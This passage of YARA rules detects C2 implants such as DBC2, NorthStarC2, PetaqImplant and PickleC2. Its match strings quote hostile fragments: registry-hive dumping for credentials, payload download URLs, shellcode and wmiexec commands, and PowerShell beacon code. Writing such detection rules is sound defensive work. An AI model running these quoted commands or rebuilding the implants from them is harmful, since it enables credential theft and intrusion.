filesize) == "ca83ab01d46925f1d3a559affd3398d1cfe5d0abd637413cd5ae25f1fe7bd008" or hash.sha256(0, filesize) == "85bc111b4d83b7fafd4c72832f23ebeadd1a9a74942aab072c928b1fc8b55625" or pe.imports("kernel32.dll", "VirtualProtect") and pe.imports("kernel32.dll", "FindNextFileW") and pe.imports("advapi32.dll", "DuplicateTokenEx") and pe.imports("advapi32.dll", "SystemFunction036") and pe.imports("winhttp.dll", "WinHttpConnect") and pe.imports("winhttp.dll", "WinHttpCrackUrl") and pe.characteristics & pe.DLL and ((uint16(0) == 0x5a4d and filesize < 4000KB and (8 of them)) or (all of them)) }
Details	Yara rule	1	import "hash" import "pe" rule Callidus_EXEs { meta: description = "Callidus - OneNoteC2Client.exe, OutlookC2Client.exe" sha256 = "96d0bec95be57bb098632ab49eb8a2f23d3a7c9dc1e288a5fb990fa5ccec1bca" sha256 = "0860153f607f4536b72d0ee821628077aa4e17f2465a00424b798c9e720505ef" strings: $s1 = "hostfxr.dll" wide fullword $s2 = "--- Invoked %s [version: %s, commit hash: %s] main = {" wide fullword $s3 = "This executable is not bound to a managed DLL to execute. The binding value is: '%s'" wide fullword $s4 = "F:\\workspace\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\cli\\apphost\\Release\\apphost.pdb" ascii fullword $s5 = "The managed DLL bound to this executable is: '%s'" wide fullword $s6 = "A fatal error was encountered. This executable was not bound to load a managed DLL." wide fullword $s7 = "Extraction completed by another process, aborting current extraction." wide fullword $s8 = "Failed to resolve full path of the current executable [%s]" wide fullword $s9 = "Failed to remove temporary file [%s]." wide fullword $s10 = "Failed to remove temporary directory [%s]." wide fullword $s11 = "The managed DLL bound to this executable could not be retrieved from the executable image." wide fullword $s12 = " - Installing .NET Core prerequisites might help resolve this problem." wide fullword $s13 = "https://go.microsoft.com/fwlink/?linkid=798306" wide fullword $s14 = "Bundle header version compatibility check failed" wide fullword $s15 = "I/O failure reading contents of the bundle." wide fullword $s16 = "Couldn't open host binary for reading contents" wide fullword $s17 = "Failed to load the dll from [%s], HRESULT: 0x%X" wide fullword $s18 = "The required library %s does not support relative app dll paths." wide fullword $s19 = "Failure processing application bundle; possible file corruption." wide fullword $s20 = "Failure processing application bundle." wide fullword condition: hash.sha256(0, filesize) == "96d0bec95be57bb098632ab49eb8a2f23d3a7c9dc1e288a5fb990fa5ccec1bca" or hash.sha256(0, filesize) == "0860153f607f4536b72d0ee821628077aa4e17f2465a00424b798c9e720505ef" or pe.imports("kernel32.dll", "FindNextFileW") and pe.imports("kernel32.dll", "RemoveDirectoryW") and pe.imports("kernel32.dll", "TerminateProcess") and pe.imports("advapi32.dll", "RegisterEventSourceW") and pe.characteristics & pe.EXECUTABLE_IMAGE and ((uint16(0) == 0x5a4d and filesize < 500KB and (8 of them)) or (all of them)) }
Details	Yara rule	1	import "hash" rule Callidus_DLLs { meta: description = "Callidus - OneNoteC2Client.dll, OutlookC2Client.dll" sha256_1 = "066857279d1e93a2ffdb1df8e1d509f6cc58a60083674e842a1e178cf1483904" sha256_2 = "4f9e6582ebf1b3d5077d8a94b3696bc71f43984c7672c9eb696868f9dd711bca" strings: $s1 = "ShellExecuteWithPath" ascii fullword $s2 = "<ShellExecuteWithPath>b__1" ascii fullword $s3 = "<ShellExecuteWithPath>b__0" ascii fullword $s4 = "System.Diagnostics.Process" ascii fullword $s5 = "ShellCommand" ascii fullword $s6 = "https://graph.microsoft.com/.default" wide fullword $s7 = "CallGetWebApiAndProcessResultASync" ascii fullword $s8 = "<CallGetWebApiAndProcessResultASync>d__5" ascii fullword $s9 = "getuserid" ascii fullword $s10 = "<CallGetWebApiAndProcessResultASync>b__5_0" ascii fullword $s11 = "CallPostWebApiAndProcessResultASync" ascii fullword $s12 = "get_contentType" ascii fullword $s13 = "get_content" ascii fullword $s14 = "getmessages" ascii fullword $s15 = "System.Configuration.ConfigurationManager" ascii fullword $s16 = "GetAccountsAsync" ascii fullword $s17 = "get_HttpClient" ascii fullword $s18 = "CallDeleteWebApiAndProcessResultASync" ascii fullword $s19 = "<content>k__BackingField" ascii fullword $s20 = "set_UseShellExecute" ascii fullword condition: hash.sha256(0, filesize) == "066857279d1e93a2ffdb1df8e1d509f6cc58a60083674e842a1e178cf1483904" or hash.sha256(0, filesize) == "4f9e6582ebf1b3d5077d8a94b3696bc71f43984c7672c9eb696868f9dd711bca" or ((uint16(0) == 0x5a4d and filesize < 80KB and (8 of them)) or (all of them)) }
Details	Yara rule	1	import "hash" import "pe" rule DBC2_Loader { meta: description = "DBC2 - dbc2Loader.dll" sha256 = "045312cb098438fe9dbcecf713766bff29d171726fb228de92ef54447564bbb4" strings: $x1 = "dbc2Loader.dll" wide fullword $s2 = "dropboxc2.C2_Agent" wide fullword $s3 = "dbc2Loader" ascii fullword $s4 = "[ERROR] Missing arguments" wide fullword $s5 = "loadDBC2" ascii fullword $s6 = "masterKey" ascii fullword $s7 = "WebRequest" ascii fullword $s8 = "Console" ascii fullword $s9 = "source" ascii fullword $s10 = "xorKey" ascii fullword $s11 = "System.Runtime.CompilerServices" ascii fullword $s12 = "System.Reflection" ascii fullword $s13 = "System" ascii fullword condition: hash.sha256(0, filesize) == "045312cb098438fe9dbcecf713766bff29d171726fb228de92ef54447564bbb4" or pe.characteristics & pe.DLL and uint16(0) == 0x5a4d and filesize < 10KB and 1 of ($x*) and 4 of them }
Details	Yara rule	1	import "pe" import "hash" rule DBC2_Agent { meta: description = "DBC2 - dbc2_agent.exe" sha256 = "ba606da59063a837e704a49b065979ad4ea4b508c8600e520a8c69948332661b" strings: $x1 = "ERROR - COULD NOT EXECUTE COMMAND:" wide fullword $s2 = "ERROR - Could not send key strokes to the process, probably wrong keystrokes sequence" wide fullword $s3 = "ERROR - Could not find a process with name " wide fullword $s4 = "https://content.dropboxapi.com/2/files/download" wide fullword $s5 = "ERROR - COULD NOT EXECUTE: " wide fullword $s6 = "OK - KeyLogger started" wide fullword $s7 = "%USERPROFILE%\\AppData\\Local\\WindowsUserLogRotate" wide fullword $s8 = "dbc2_agent.exe" wide fullword $s9 = "https://content.dropboxapi.com/2/files/upload" wide fullword $s10 = "https://api.dropboxapi.com/2/files/get_metadata" wide fullword $s11 = "OK - PROCESS STARTED: " wide fullword $s12 = "OK - Key strokes sent to process " wide fullword $s13 = "OK - Clipboard logger started" wide fullword $s14 = "schtasks /create /TN 'WindowsUserLogRotate' /TR '" wide fullword $s15 = "https://api.dropboxapi.com/2/files/list_folder" wide fullword $s16 = "https://api.dropboxapi.com/2/files/move" wide fullword $s17 = "https://api.dropboxapi.com/2/files/delete" wide fullword $s18 = "clipboardlogger" wide fullword $s19 = "OK - FILE DOWNLOADED AT: " wide fullword $s20 = "shellProcess" ascii fullword condition: hash.sha256(0, filesize) == "ba606da59063a837e704a49b065979ad4ea4b508c8600e520a8c69948332661b" or pe.characteristics & pe.EXECUTABLE_IMAGE and uint16(0) == 0x5a4d and filesize < 70KB and 1 of ($x*) and 4 of them }
Details	Yara rule	1	import "hash" import "pe" rule DeimosC2_Win { meta: description = "DeimosC2 - lsadump.exe, minidump.exe, ntdsdump.exe, samdump.exe, screengrab.exe" sha256_1 = "d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967" sha256_2 = "0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e" sha256_3 = "195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c" sha256_4 = "cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd" sha256_5 = "eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3" strings: $x1 = "template: no template %q associated with template %qtls: received a session ticket with invalid lifetimetls: server selected uns" $x2 = "tls: client certificate used with invalid signature algorithmtls: server sent a ServerHello extension forbidden in TLS 1.3tls: u" $x3 = "bytes.Buffer: reader returned negative count from Readcertificate is not valid for requested server name: %wcryptobyte: Builder " $x4 = "runtime: GetQueuedCompletionStatus returned invalid mode= tls: server changed cipher suite after a HelloRetryRequesturlPartNoneu" $x5 = "runtime: netpoll: PostQueuedCompletionStatus failed (errno= tls: initial handshake had non-empty renegotiation extensiontls: no " $x6 = "invalid network interface nameinvalid pointer found on stacklength mismatch in decodeArraylength mismatch in ignoreArraylooking " $s7 = "oot of negative numberstream error: stream ID %d; %vsync: inconsistent mutex statesync: unlock of unlocked mutextext/javascript;" $s8 = "non-IPv4 addressnon-IPv6 addressntrianglelefteq;object is remotepacer: H_m_prev=proxy-connectionquoted-printablereflect mismatch" $s9 = "= flushGen for type gfreecnt= pages at runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= target" $s10 = "y typereflect: Out of non-func type rpc: error executing template:rpc: service already defined: runqputslow: queue is not fullru" $s11 = "nt array or slice: length exceeds input size (%d elements)http2: Transport conn %p received error from processing frame %v: %vht" $s12 = "pc= throwing= until pc=%!Weekday(%s\|%s%s\|%s, bound = , limit = /dev/stdin01234567891220703125127.0.0.1:6103515625: parsing :auth" $s13 = "[originating from goroutine _html_template_rcdataescaper_html_template_srcsetescaper_html_template_urlnormalizerasn1: string not" $s14 = "supported versions satisfy MinVersion and MaxVersionnet/http: invalid Cookie.Domain %q; dropping domain attributerpc.Register: a" $s15 = "sched={pc: /* %s /null but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args $htmlt" $s16 = "internal/poll.(ioSrv).ExecIO" ascii fullword $s17 = "os.Executable" ascii fullword $s18 = "rof.dll" ascii fullword $s19 = "runtime: GetQueuedCompletionStatus returned invalid mode= tls: server changed cipher suite after a HelloRetryRequesturlPartNoneu" $s20 = "i32.dll" ascii fullword condition: hash.sha256(0, filesize) == "d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967" or hash.sha256(0, filesize) == "0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e" or hash.sha256(0, filesize) == "195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c" or hash.sha256(0, filesize) == "cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd" or hash.sha256(0, filesize) == "eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3" or pe.imports("kernel32.dll", "DuplicateHandle") and pe.imports("kernel32.dll", "SwitchToThread") and pe.characteristics & pe.EXECUTABLE_IMAGE and (uint16(0) == 0x5a4d and filesize < 22000KB and (1 of ($x*) and 4 of them)) or (all of them) }
Details	Yara rule	1	import "hash" rule DeimosC2_Unix { meta: description = "DeimosC2 - screengrab.elf, shadowdump.elf" sha256_1 = "cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050" sha256_2 = "2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7" strings: $x1 = "fmt: unknown base; can't happenhttp2: connection error: %v: %vin literal null (expecting 'l')in literal null (expecting 'u')in l" $x2 = "bytes.Buffer: reader returned negative count from Readcertificate is not valid for requested server name: %wcryptobyte: Builder " $x3 = "59604644775390625: missing method ; SameSite=StrictCOMPRESSION_ERRORCirculateNotify {ConfigureNotify {DiacriticalAcute;Diacritic" $x4 = "strings.Builder.Grow: negative countsyntax error scanning complex numbertls: keys must have at least one keytls: server did not " $x5 = "adding nil Certificate to CertPoolbad scalar length: %d, expected an't evaluate field %s in type %scan't handle %s for arg of" $x6 = "runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangeslice bounds out of range [:%x] with" $x7 = "IDS_Trinary_OperatorInsufficient StorageLeftArrowRightArrow;MAX_HEADER_LIST_SIZEMeroitic_HieroglyphsNegativeMediumSpace;NotGreat" $x8 = "s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrconv: internal error, rest " $x9 = "tls: client certificate contains an unsupported public key of type %Ttls: handshake message of length %d bytes exceeds maximum o" $x10 = "lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnablestrict-trans" $x11 = "got CONTINUATION for stream %d; expected stream %dhttp: putIdleConn: CloseIdleConnections was calledhttp: suspiciously long trai" $x12 = "%s slice too big: %d elements of %d bytes34694469519536141888238489627838134765625MapIter.Next called on exhausted iteratorTime." $x13 = ", RecursionAvailable: .localhost.localdomain/etc/apache/mime.types/etc/ssl/ca-bundle.pem/lib/time/zoneinfo.zip/usr/local/share/c" $x14 = "runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: stat underflow: val runtime: sudog with non-nil cruntime: sum" $x15 = "173472347597680709441192448139190673828125867361737988403547205962240695953369140625MapIter.Value called on exhausted iteratorPR" $x16 = "gob: cannot encode nil pointer of type heapBitsSetTypeGCProg: small allocationhttp: putIdleConn: keep alives disabledinvalid ind" $x17 = "HumpEqual;IP addressKeep-AliveKeyPress {KharoshthiLeftArrow;LeftFloor;Leftarrow;LessTilde;ManichaeanMellintrf;Message-IdMinusPlu" $x18 = "checkdead: no m for timercontext deadline exceedederror decoding []byte: %sexpected string; found %sexplicit tag has no childhtt" $x19 = "template: no template %q associated with template %qtls: received a session ticket with invalid lifetimetls: server selected uns" $x20 = "file descriptor in bad statefindrunnable: netpoll with pgcstopm: negative nmspinninggeneral SOCKS server failuregob: cannot enco" condition: hash.sha256(0, filesize) == "cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050" or hash.sha256(0, filesize) == "2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7" or uint16(0) == 0x457f and filesize < 23000KB and 1 of ($x*) }
Details	Yara rule	1	import "hash" import "pe" rule GrimReaperC2_Agent { meta: description = "GrimReaperC2 - Agent_x64.exe, Agent_x86.exe" sha256_1 = "83c92e978a094fbc4d2c5f8d009a28da54c5677c1d55af61c3c2e2c33ea712af" sha256_2 = "b059fc8cce2a0ca169dd3aae76c13d43a3fee0821a2bbb5b0d8b97d067c6eb08" strings: $s1 = " <requestedExecutionLevel level='asInvoker' uiAccess='false' />" ascii fullword $s2 = " -> CommandId: %u" ascii fullword $s3 = "[+] agent is identifying.." ascii fullword $s4 = "InternetReadFile Error: (%lu)" ascii fullword $s5 = "Error reading file %ld" ascii fullword $s6 = "Couldn't get file size" ascii fullword $s7 = "[+] Sending %lu bytes: %.*s" ascii fullword $s8 = "[+] Got task ID: %u" ascii fullword $s9 = "HttpSendRequest Error: (%lu)" ascii fullword $s10 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword $s11 = "fetching commands.." ascii fullword $s12 = "got token: %s" ascii fullword $s13 = "Error writting file." ascii fullword $s14 = "Opening file %s for %s" ascii fullword $s15 = "writing to file" ascii fullword $s16 = "closing file" ascii fullword $s17 = "listing files" ascii fullword $s18 = "Mozilla/5.0" ascii fullword $s19 = "connect" ascii fullword condition: hash.sha256(0, filesize) == "83c92e978a094fbc4d2c5f8d009a28da54c5677c1d55af61c3c2e2c33ea712af" or hash.sha256(0, filesize) == "b059fc8cce2a0ca169dd3aae76c13d43a3fee0821a2bbb5b0d8b97d067c6eb08" or pe.imports("advapi32.dll", "OpenProcessToken") and pe.imports("wininet.dll", "InternetConnectW") and pe.imports("kernel32.dll", "FindNextFileW") and pe.imports("kernel32.dll", "CreateToolhelp32Snapshot") and pe.imports("kernel32.dll", "Process32NextW") and ((uint16(0) == 0x5a4d and filesize < 60KB and (8 of them)) or (all of them)) }
Details	Yara rule	1	import "hash" import "pe" rule FlyingAFalseFlag_Exchanger { meta: description = "FlyingAFalseFlag - Exchanger_x64.exe, Exchanger_x86.exe" sha256_1 = "6a5605da5f7207b1b14b798e9428c2310633664eed53ce7bdb39a6847eff6609" sha256_2 = "c337983b7eefbea3cc02e4d011398292ccbd475ba932ced40603a4a9a3927032" strings: $s1 = "api-ms-win-core-synch-l1-2-0.dll" wide fullword $s2 = "<GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\">" ascii fullword $s3 = "<DeleteItem DeleteType=\"HardDelete\" xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\">" ascii fullword $s4 = "<soap:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:t=" $s5 = "://schemas.microsoft.com/exchange/services/2006/types\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"" $s6 = "[+] Found vault creds: %s / " ascii fullword $s7 = "[!] Failed to execute tasking" ascii fullword $s8 = " <requestedExecutionLevel level='asInvoker' uiAccess='false' />" ascii fullword $s9 = "[+] Auto-hide rule '%s' is ready" ascii fullword $s10 = "mail@<domain.com>" ascii fullword $s11 = "%localappdata%\\Microsoft\\Outlook\\" wide fullword $s12 = "<AutoDiscoverSMTPAddress>" ascii fullword $s13 = "<m:MailboxSmtpAddress>MAILBOX</m:MailboxSmtpAddress>" ascii fullword $s14 = "[+] Got tasking... executing." ascii fullword $s15 = "<soap:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:t=" $s16 = "[!] Failed to create rule '%s'" ascii fullword $s17 = "[!] Failed to beacon to '%s'" ascii fullword $s18 = "</m:GetInboxRules>" ascii fullword $s19 = " </soap:Header>" ascii fullword condition: hash.sha256(0, filesize) == "6a5605da5f7207b1b14b798e9428c2310633664eed53ce7bdb39a6847eff6609" or hash.sha256(0, filesize) == "c337983b7eefbea3cc02e4d011398292ccbd475ba932ced40603a4a9a3927032" or pe.imports("kernel32.dll", "FindNextFileW") and pe.imports("kernel32.dll", "TerminateProcess") and pe.imports("wininet.dll", "InternetConnectA") and pe.imports("advapi32.dll", "LookupAccountSidA") and ((uint16(0) == 0x5a4d and filesize < 300KB and (8 of them)) or (all of them)) }
Details	Yara rule	1	import "pe" import "hash" rule MikeC2_DllHijack { meta: description = "MikeC2 - DllHijack.dll" sha256 = "28bcbcf21baaf1310fbda8a9e2d34d480d1f8e5f65d87abba6326a71565d1714" strings: $s1 = "DllHijack.dll" ascii fullword $s2 = " <requestedExecutionLevel level='asInvoker' uiAccess='false' />" ascii fullword $s3 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword $s4 = "tester" ascii fullword $s5 = ".rdata$voltmd" ascii fullword $s6 = " </trustInfo>" ascii fullword $s7 = " </requestedPrivileges>" ascii fullword $s8 = " <requestedPrivileges>" ascii fullword $s9 = ";);.;A;a;~;" ascii fullword $s10 = "=K=T=]=k=t=" ascii fullword $s11 = "SVWj h" ascii fullword $s12 = "2*2K2P2i2n2{2" ascii fullword $s13 = "11}1" ascii fullword $s14 = "0#0/0G0W0]0t0" ascii fullword $s15 = "646C6L6Y6o6" ascii fullword $s16 = "5 535A5G5M5S5Y5_5f5m5t5{5" ascii fullword condition: hash.sha256(0, filesize) == "28bcbcf21baaf1310fbda8a9e2d34d480d1f8e5f65d87abba6326a71565d1714" or pe.imports("kernel32.dll", "WriteProcessMemory") and pe.imports("kernel32.dll", "CreateToolhelp32Snapshot") and pe.imports("kernel32.dll", "CreateRemoteThread") and uint16(0) == 0x5a4d and filesize < 30KB and 8 of them }
Details	Yara rule	1	import "hash" rule MikeC2_MikeDrop { meta: description = "MikeC2 - MikeDrop.exe" sha256 = "933241f02ef81bef5f6b51ce3e5b3dbf242c829f899f64d2f10b0bad668a6424" strings: $s1 = "http://kali.host/MikeC2.exe" wide fullword $s2 = "MikeDrop.exe" wide fullword $s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword $s4 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword $s5 = ".NETFramework,Version=v4.7.2" ascii fullword $s6 = ".NET Framework 4.7.2" ascii fullword $s7 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36" wide fullword $s8 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword $s9 = "UserName: {0}" wide fullword $s10 = "Domain UserName: {0}" wide fullword $s11 = "MikeC2.Program" wide fullword $s12 = "MikeDrop" wide fullword $s13 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword $s14 = "DoMikeC2" ascii fullword $s15 = "user-agent" wide fullword $s16 = "Program" ascii fullword $s17 = "Console" ascii fullword $s18 = " </trustInfo>" ascii fullword $s19 = "Invoke" ascii fullword condition: hash.sha256(0, filesize) == "933241f02ef81bef5f6b51ce3e5b3dbf242c829f899f64d2f10b0bad668a6424" or uint16(0) == 0x5a4d and filesize < 20KB and 8 of them }
Details	Yara rule	1	import "hash" import "pe" rule Nimbo_C2_WinBin_agent { meta: description = "Nimbo-C2 - agent.dll" sha256 = "46be6cee13305cd4175e75a37308478ff48685665bbb062b8c665d672f0f4b0d" strings: $x1 = "yIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"\" publicKeyTok" $x2 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersio" $s3 = "@System.Drawing.dll" ascii fullword $s4 = "@System.dll" ascii fullword $s5 = "agent_execution_path_windows__config_30" ascii fullword $s6 = "agent_execution_path_linux__config_32" ascii fullword $s7 = "@unable to get interface of CorRuntimeHost" ascii fullword $s8 = "@System.CodeDom.Compiler.CompilerParameters" ascii fullword $s9 = "execute_encoded_powershell__windowsZutilsZclr_5" ascii fullword $s10 = "3674214126" $s11 = "@unable to get interface of CLRRuntimeHost" ascii fullword $s12 = "@Ws2_32.dll" ascii fullword $s13 = "2969576475" $s14 = "@GenerateExecutable" ascii fullword $s15 = "sleep_on_execution__config_28" ascii fullword $s16 = "queryProcessCycleTime" ascii fullword $s17 = "queryIdleProcessorCycleTime" ascii fullword $s18 = "@unable to start CorRuntimeHost" ascii fullword $s19 = "SIGSEGV: Illegal storage access. (Attempt to read from nil?)" ascii fullword condition: hash.sha256(0, filesize) == "46be6cee13305cd4175e75a37308478ff48685665bbb062b8c665d672f0f4b0d" or pe.imports("kernel32.dll", "VirtualProtect") and uint16(0) == 0x5a4d and filesize < 1000KB and 1 of ($x) and 4 of them }
Details	Yara rule	1	import "hash" rule Nimbo_C2_UnixBin_agent { meta: description = "Nimbo-C2 - agent.so" sha256 = "9fb7870c7c1dc8d2dd61ba77e34efe580ad0151c9b59b201b17a45a211d8ff49" strings: $s1 = "agent_execution_path_linux__config_32" ascii fullword $s2 = "agent_execution_path_windows__config_30" ascii fullword $s3 = "AWAVAUA" ascii fullword $s4 = "sleep_on_execution__config_28" ascii fullword $s5 = "SIGSEGV: Illegal storage access. (Attempt to read from nil?)" ascii fullword $s6 = "SIGPIPE: Pipe closed." ascii fullword $s7 = "reportUnhandledError__system_2855" ascii fullword $s8 = "reportUnhandledErrorAux__system_2752" ascii fullword $s9 = "getBigChunk__system_4510" ascii fullword $s10 = "getBottom__system_3996" ascii fullword $s11 = "getActiveStack__system_5401" ascii fullword $s12 = "cellSetGet__system_4918" ascii fullword $s13 = "doOperation__system_5296" ascii fullword $s14 = "getHugeChunk__system_4525" ascii fullword $s15 = "intSetGet__system_4180" ascii fullword $s16 = "sweep__system_5710" ascii fullword $s17 = "NTIhttpheaders__FbZeO4trJhT2CCJ9aLxejqw_" ascii fullword $s18 = "getDiscriminant__system_3619" ascii fullword $s19 = "getFileHandle__systemZio_228" ascii fullword $s20 = "getOccupiedMem__system_1936" ascii fullword condition: hash.sha256(0, filesize) == "9fb7870c7c1dc8d2dd61ba77e34efe580ad0151c9b59b201b17a45a211d8ff49" or uint16(0) == 0x457f and filesize < 600KB and 8 of them }
Details	Yara rule	1	import "hash" rule NorthStarC2 { meta: description = "NorthStarC2 - NorthstarStager.exe" sha256 = "f7f92158b53e6bcd8b2eb293e4802e2759c1943096e2da3d03486f36f053801c" strings: $s1 = "reg.exe save hklm\\sam c:\\temp\\sam.save & reg.exe save hklm\\security c:\\temp\\security.save & reg.exe save hklm\\system c:" wide $s2 = " " ascii fullword $s3 = "SystemHealthCheck.exe" wide fullword $s4 = "processCommand" ascii fullword $s5 = "NorthstarStager.exe" wide fullword $s6 = "_SAMDUMP.zip" wide fullword $s7 = "login.php" wide fullword $s8 = "_getProcesses" ascii fullword $s9 = "bypassuac" wide fullword $s10 = "Probably bypassed check new connection" wide fullword $s11 = "samdump" wide fullword $s12 = "set_UseShellExecute" ascii fullword $s13 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />" ascii fullword $s14 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />" ascii fullword $s15 = "uploadfile" wide fullword $s16 = "getjuice.php" wide fullword $s17 = "_samDump" ascii fullword $s18 = "Cmd mode enabled, all commands will be redirect to CMD. Response delay is : " wide fullword $s19 = "Command not found, you may need to enable CMD mode <enablecmd or enable cmd>" wide fullword $s20 = "SOFTWARE\\Classes\\mscfile\\shell\\open\\command" wide fullword condition: hash.sha256(0, filesize) == "f7f92158b53e6bcd8b2eb293e4802e2759c1943096e2da3d03486f36f053801c" or uint16(0) == 0x5a4d and filesize < 70KB and 8 of them }
Details	Yara rule	1	import "hash" rule PetaqImplant { meta: description = "PetaqImplant - PetaqImplant.exe" sha256 = "8ed63f7ea1a79dbf2cc9a338feff1dd4491a9daac38d4c86f67d7211783ae272" strings: $x1 = " exec cmd.exe /c dir" wide fullword $x2 = " execthread cmd.exe /c dir" wide fullword $x3 = " lateralmovement wmiexec domain=galaxy username=administrator password=Password3 host=10.0.0.1 command=\"powershell " wide fullword $x4 = " lateralmovement wmiexec domain=DOMAIN username=USER password=PASSWORD host=REMOTEHOST command=\"COMMANDTORUN\"" wide fullword $s5 = "Invalid credentials error may occur if the logged on user has no access to remote server IPC$. Try this before linking 'net use " wide $s6 = "The process is running with the payload injected." wide fullword $s7 = " exec-sharpassembly url http://127.0.0.1/test.exe" wide fullword $s8 = " exec-shellcode url http://127.0.0.1/Shellcode.bin ARCH64 T1" wide fullword $s9 = " exec-shellcode url http://127.0.0.1/Shellcode.bin ARCH32 T2" wide fullword $s10 = "Execute a command/binary:" wide fullword $s11 = "* link smb://192.168.1.1/NamedPipeName" wide fullword $s12 = "Setting the startup information for the process to inject." wide fullword $s13 = " download c:\\windows\\temp\\1.txt" wide fullword $s14 = "Execute Shellcode:" wide fullword $s15 = "Pushing the payload to the process memory." wide fullword $s16 = "Compile & Execute .NET source code:" wide fullword $s17 = "PetaqImplant.exe" wide fullword $s18 = "* transmit SESSIONID COMMAND" wide fullword $s19 = "shellcode" ascii fullword $s20 = "ExecShellcodeBridge" ascii fullword condition: hash.sha256(0, filesize) == "8ed63f7ea1a79dbf2cc9a338feff1dd4491a9daac38d4c86f67d7211783ae272" or uint16(0) == 0x5a4d and filesize < 200KB and 1 of ($x*) and 4 of them }
Details	Yara rule	1	import "hash" rule PickleC2 { meta: description = "PickleC2 - powershell.ps1" sha256 = "3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1" strings: $s1 = "function Execute($key,$ip,$port,$implant_name,$sleep_time){" ascii fullword $s2 = "Execute $key $ip $port $implant_name $sleep_time" ascii fullword $s3 = " $LocalIPs = \"LocalIPs(\" + (([System.Net.Dns]::GetHostByName($NULL).AddressList \| Select IPAddressToString \| findstr \".." $s4 = " $process.startInfo.UseShellExecute = $false" ascii fullword $s5 = " $Hostname = \"Machine_Name(\"+ [System.Net.Dns]::GetHostByName($NULL).Hostname + \")\"" ascii fullword $s6 = " $data = (Invoke-WebRequest -UseBasicParsing -Uri $file_download -Method 'POST').Content" ascii fullword $s7 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);" ascii fullword $s8 = " $LocalIPs = \"LocalIPs(\" + (([System.Net.Dns]::GetHostByName($NULL).AddressList \| Select IPAddressToString \| findstr \".." $s9 = " $process.StandardOutput.ReadToEnd() + $process.StandardError.ReadToEnd() " ascii fullword $s10 = " $cmd = \"cmd.exe\"" ascii fullword $s11 = " $file_download = \"ht\" + 'tp:' + \"//\" + $ip + \":$port/task/$implant_name/file.ret\"" ascii fullword $s12 = " elseif ($binary -eq \"execute\"){" ascii fullword $s13 = " -join ',').replace('IPAddressToString,-----------------,','').replace(\" \",\"\") + \")\"" ascii fullword $s14 = " $cmd = \"powershell.exe\"" ascii fullword $s15 = "function Decrypt-String($key, $encryptedStringWithIV) {" ascii fullword $s16 = " $task_req = (Invoke-WebRequest -UseBasicParsing -Uri $task -Method 'GET').Content" ascii fullword $s17 = " $task = \"ht\" + \"tp:\" + \"//\" + $ip + \":$port/task/$implant_name\"" ascii fullword $s18 = " $result = \"ht\" + \"tp:\" + \"//\" + $ip + \":$port/result/$implant_name\"" ascii fullword $s19 = " $process.startInfo.RedirectStandardError = $true" ascii fullword $s20 = " $results = Encrypt-String $key \"Downloaded\"" ascii fullword condition: hash.sha256(0, filesize) == "3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1" or uint16(0) == 0x7566 and filesize < 20KB and 8 of them }
